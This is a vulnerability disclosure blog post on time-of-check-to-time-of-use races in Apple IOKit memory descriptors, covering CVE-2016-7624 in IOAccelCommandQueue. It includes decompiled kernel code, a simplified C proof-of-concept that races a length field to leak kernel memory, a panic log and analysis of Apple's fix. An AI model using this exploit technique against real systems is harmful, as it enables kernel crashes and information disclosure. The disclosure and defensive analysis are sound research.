Racing for everyone: descriptor describes TOCTOU in Apple's core

Racing for everyone: descriptor describes TOCTOU in Apple’s core

This blog post is about a new type of vulnerabilities in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using a IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there’re even more issues of this type on iOS’/OSX’s IOKit drivers and fortunately Apple fixed them also.

Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

1709 kern_return_t
1710 IOConnectCallMethod(
1711    mach_port_t  connection,        // In
1712    uint32_t     selector,      // In
1713    const uint64_t  *input,         // In
1714    uint32_t     inputCnt,      // In
1715    const void  *inputStruct,       // In
1716    size_t       inputStructCnt,    // In
1717    uint64_t    *output,        // Out
1718    uint32_t    *outputCnt,     // In/Out
1719    void        *outputStruct,      // Out
1720    size_t      *outputStructCntP)  // In/Out
1721 {
//...
1736     if (inputStructCnt <= sizeof(io_struct_inband_t)) {
1737    inb_input      = (void *) inputStruct;
1738    inb_input_size = (mach_msg_type_number_t) inputStructCnt;
1739     }
1740     else {
1741    ool_input      = reinterpret_cast_mach_vm_address_t(inputStruct);
1742    ool_input_size = inputStructCnt;
1743     }
1744 //...
1770    else if (size <= sizeof(io_struct_inband_t)) {
1771        inb_output      = outputStruct;
1772        inb_output_size = (mach_msg_type_number_t) size;
1773    }
1774    else {
1775        ool_output      = reinterpret_cast_mach_vm_address_t(outputStruct);
1776        ool_output_size = (mach_vm_size_t)    size;
1777    }
1778     }
1779
1780     rtn = io_connect_method(connection,         selector,
1781                (uint64_t *) input, inputCnt,
1782                inb_input,          inb_input_size,
1783                ool_input,          ool_input_size,
1784                inb_output,         &inb_output_size,
1785                output,             outputCnt,
1786                ool_output,         &ool_output_size);
1787
//...
1795     return rtn;
1796 }

If the inputstruct is larger than sizeof(io_struct_inband_t), the passed in argument will be casted to a mach_vm_address_t, otherwise just a native pointer.

Is this one race-able? No? Is that one race-able?

For a curious mind one would like to ask, if there exists any possibility that this can be modified to lead to TOCOU? Historical vulnerabilities focuses on racing memories shared via IOConnectMapMemory, whose meaning is very obvious according to this name (see Pangu’s and Ian Beer‘s ) research), however these kinds of vulns are mostly eliminated now.

Eyes turned to these simple and naive IOKit arguments, are these benign little spirits even race-able?

Lets see how these arguments are passed from userspace to kernel space.

In MIG trap defs and generated code, different input types are dealt in different ways.

601
602routine io_connect_method(
603     connection      : io_connect_t;
604 in  selector        : uint32_t;
605
606 in  scalar_input    : io_scalar_inband64_t;
607 in  inband_input    : io_struct_inband_t;
608 in  ool_input       : mach_vm_address_t;
609 in  ool_input_size  : mach_vm_size_t;
610
611 out inband_output   : io_struct_inband_t, CountInOut;
612 out scalar_output   : io_scalar_inband64_t, CountInOut;
613 in  ool_output      : mach_vm_address_t;
614 inout ool_output_size   : mach_vm_size_t
615 );
616
```
```
/* Routine io_connect_method */
mig_external kern_return_t io_connect_method
(
    mach_port_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
)
{
//...
    (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
//...
    if (inband_inputCnt > 4096) {
        { return MIG_ARRAY_TOO_LARGE; }
    }
    (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
//...
    InP->ool_input = ool_input;
    InP->ool_input_size = ool_input_size;

OK, seems scala-input and struct-input with size < 4096 are copied and bundled inband of the mach-msg, then passed into kernel space. No way.

However, Struct-input with size > 4096 remains mach_vm_address and is untouched.

Now lets dive into kernel space

3701 kern_return_t is_io_connect_method
3702 (
3703    io_connect_t connection,
3704    uint32_t selector,
3705    io_scalar_inband64_t scalar_input,
3706    mach_msg_type_number_t scalar_inputCnt,
3707    io_struct_inband_t inband_input,
3708    mach_msg_type_number_t inband_inputCnt,
3709    mach_vm_address_t ool_input,
3710    mach_vm_size_t ool_input_size,
3711    io_struct_inband_t inband_output,
3712    mach_msg_type_number_t *inband_outputCnt,
3713    io_scalar_inband64_t scalar_output,
3714    mach_msg_type_number_t *scalar_outputCnt,
3715    mach_vm_address_t ool_output,
3716    mach_vm_size_t *ool_output_size
3717 )
3718 {
3719     CHECK( IOUserClient, connection, client );
3720
3721     IOExternalMethodArguments args;
3722     IOReturn ret;
3723     IOMemoryDescriptor * inputMD  = 0;
3724     IOMemoryDescriptor * outputMD = 0;
3725
//...
3736     args.scalarInput = scalar_input;
3737     args.scalarInputCount = scalar_inputCnt;
3738     args.structureInput = inband_input;
3739     args.structureInputSize = inband_inputCnt;
3740
3741     if (ool_input)
3742    inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
3743                            kIODirectionOut, current_task());
3744
3745     args.structureInputDescriptor = inputMD;
//...
3753     if (ool_output && ool_output_size)
3754     {
3755    outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
3756                            kIODirectionIn, current_task());
//...
3774     return (ret);
3775 }

Seems Apple and Linus take a different approach here. In Linux kernel, usually incoming userspace content are copied to kernel-allocated memory content using copy_from_user. However here the Apple kernel directly creates a memory descriptor using the userspace address, rather than creating a copy.

So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?

Surprisingly, the answer is yes!

This means, for a IOKit call, if the corresponding IOService accepts input memory descriptor, the userspace program can alter the content while the IOService is processing it, no lock, no write prevention. Juicy place for racing conditions and TOCTOUs(Time to check before time to use) 🙂 After this bug is fixed I talked to security folks at Apple and they said even they didn’t realized the descriptor mapped memory is writable by userspace.

I quickly identified several potential vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface, one of them (CVE-2016-7624) is described below. And there’re far more patterns than that, using your imagination 🙂

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There exists an TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either inband struct or structureInputDescriptor. Data controlled by attacker is passed into the function and at certain offset a value is used as length. The length is validated but due to the nature of MemoryDescriptor, client can still change the value when its actually used by modifying the mapped memory, causing TOCTOU that lead to information disclosure or other possible oob write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accept user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace mapped address, it will use structureInputDescriptor and get a IOMemoryMap then get its address and use it. But nothing prevents userspace from modifying the content represented by the address, lead to TOCTOU.

__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
{
  IOExternalMethodArguments *v3; // r12@1
  IOAccelCommandQueue *v4; // r15@1
  unsigned __int64 inputdatalen; // rsi@1
  unsigned int v6; // ebx@1
  IOMemoryDescriptor *v7; // rdi@3
  __int64 v8; // r14@3
  __int64 inputdata; // rcx@5
  v3 = a3;
  v4 = this;
  inputdatalen = (unsigned int)a3->structureInputSize;
  v6 = -536870206;
  if ( inputdatalen >= 8
    && inputdatalen - 8 == 3
                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
  {
    v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
    v8 = 0LL;
    if ( v7 )
    {
      v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
      v6 = -536870200;
      if ( !v8 )
        return v6;
      inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
      LODWORD(inputdatalen) = v3->structureInputSize;
    }

We can see that at offset+4, a DWORD is retrived as length and compared with ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen – 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

And then this length offset is used again in submit_command_buffer. See the following code:

  if ( *((_QWORD *)this + 160) )
  {
    v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
    if ( v5 )
    {
      IOAccelShared2::processResourceDirtyCommands(v5);
      IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
      if ( *(_DWORD *)(input + 4) )
      {
        v6 = (unsigned __int64 *)(input + 24);
        v7 = 0LL;
        do
        {
          IOAccelCommandQueue::submitCommandBuffer(
            (IOAccelCommandQueue *)v2,
            *((_DWORD *)v6 - 4),//v6 based on input
            *((_DWORD *)v6 - 3),//based on input
            *(v6 - 1),//based on input
            *v6);//based on input
          ++v7;
          v6 += 3;
        }
        while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
      }

Notice in line 23 that *(input+4) is accessed again as loop boundary. However if user passes in a descriptor, then he can modify it at userland and bypass the check in s_submit_command_buffers, cause the loop to go out-of-bound.

In IOAccelCommandQueue::submitCommandBuffer, in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24_minus_8,
      0LL,
      v13);
    result = IOGraphicsAccelerator2::sendBlockFenceNotification(
               *((IOGraphicsAccelerator2 **)this + 166),
               (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
               data_from_input_add_24,
               0LL,
               v13);

The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to place after the mapped descriptor memory, the OOB can get this content back to userspace, lead to infoleak.

The exploit steps are

  • Userspace program mmaps memory page, pass it as iokit call argument structureInputDescriptor
  • s_submit_command_buffer validates at +4 the content is legal compared to the total incoming structureInput length
  • submit_command_buffer iterates the passed in descriptor memory from userspace, using the +4 as boundary length indicator. Memory content readed is calculated in submitCommandBuffer and send back to userspace via installed asyncNotificationPort.
  • Userspace program races to modify this +4 offset value, causing the loop to go out-of-bound, leaking adjacent memory in Kernel address space.

Notice that the inputdatelen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API. Because in this API, structureInput and structureInputDescriptor cannot be passed at same time.

Instead we directly call _io_connect_method private function in IOKit framework, which accepts structureInput and structureInputDescriptor at same time.

POC code

POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:

volatile unsigned int secs = 10;
void modifystrcut()
{
    *((unsigned int*)(input+4)) = 0x7fffffff;
    printf("secs %x\n", secs);
}
    //...
int main(int argc, const char * argv[]) {
    io_iterator_t iterator;
    //...
    getFunc();
    io_connect_t conn;
    io_service_t svc;
    //...
    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
    svc = IOIteratorNext(iterator);
    printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
    //...
    io_connect_t sharedconn;
    IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
    IOConnectAddClient(conn, sharedconn);
    //then set async ref
    ref = IONotificationPortCreate(kIOMasterPortDefault);
    port = IONotificationPortGetMachPort(ref);
    pthread_t rt;
    pthread_create(&rt, NULL, gaorunloop, NULL);
        io_async_ref64_t asyncRef;
    asyncRef[kIOAsyncCalloutFuncIndex] = callback;
    asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
    //...
    const uint32_t outputcnt = 0;
    const size_t outputcnt64 = 0;
    IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
    //...
    size_t i=0;
    input = dommap();
    {
        char* structinput = input;
    *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
    size_t outcnt = 0;
    }
        //...
    const size_t bufsize = 4088;
    char buf[bufsize];
    memset(buf, 'a', sizeof(buf)*bufsize);
    size_t outcnt =0;
    *((unsigned int*)(buf+4)) = 0xaa;
        //...
    {
        pthread_t t;
        pthread_create(&t, NULL, modifystrcut, NULL);
    //...
    io_connect_method(
                      conn,
                      1,
                      NULL,//input
                      0,//inputCnt
                      buf,//inb_input
                      bufsize,//inb_input_size
                      reinterpret_cast_mach_vm_address_t(input),//ool_input
                      ool_size,//ool_input_size
                      buf,//inb_output
                      (mach_msg_type_number_t*)&outputcnt, //inb_output_size*
                      (uint64_t*)buf,//output
                      &outputcnt, //outputCnt
                      reinterpret_cast_mach_vm_address_t(buf), //ool_output
                      (mach_msg_type_number_t*)&outputcnt64//ool_output_size*
                      );
    }

Two key constans are 4088 and 0xaa, this two numbers will comfort the check at

 inputdatalen - 8 == 3
                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

   if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL
                                                                       * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen
                                                                                           - 8) >> 64) >> 4) )

Panic Report

panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0
Backtrace (CPU 0), Frame : Return Address
0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
      Kernel Extensions in backtrace:
         com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
         com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
            dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
            dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000
BSD process name corresponding to current thread: cmdqueue1
Boot args: keepsyms=1 -v
Mac OS version:
15F34
Kernel version:
Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
Kernel slide:     0x000000001dc00000
Kernel text base: 0xffffff801de00000
__HIB  text base: 0xffffff801dd00000
System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling the RIP register

__text:000000000002929E                 mov     esi, [rbx-10h]  ; unsigned int
__text:00000000000292A1                 mov     edx, [rbx-0Ch]  ; unsigned int
__text:00000000000292A4                 mov     rcx, [rbx-8]    ; unsigned __int64
__text:00000000000292A8                 mov     r8, [rbx]       ; unsigned __int64

We can see at the crash address, rbx has already go out-of-bound, hits an adjacent unmapped area, lead to crash.

Tested on 10.11.5 Macbook Airs, Macbook Pros with command line

while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.11.2 haven’t been released, but let’s have a look at disassembled kernel.

Originally, we have these lines when creating a descriptor:

3741     if (ool_input)
3742    inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
3743                            kIODirectionOut, current_task());

Proved by dissembling unmatched kernel:

mov     rax, gs:8
mov     rcx, [rax+308h] ; unsigned int
mov     edx, 2          ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

While on the 10.11.2, the corresponding snippet in _is_io_connect_method changed to:

mov     rax, gs:8
mov     rcx, [rax+318h] ; unsigned int
mov     edx, 20002h     ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag Apple has fixed these type of vulns by setting these descriptors to MAP_MEM_VM_COPY, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Will it solve these issues once and for all?

Credits

Credit also goes to Liang Chen of KeenLab for also contributing to this research.

Leave a Reply

Your email address will not be published. Required fields are marked *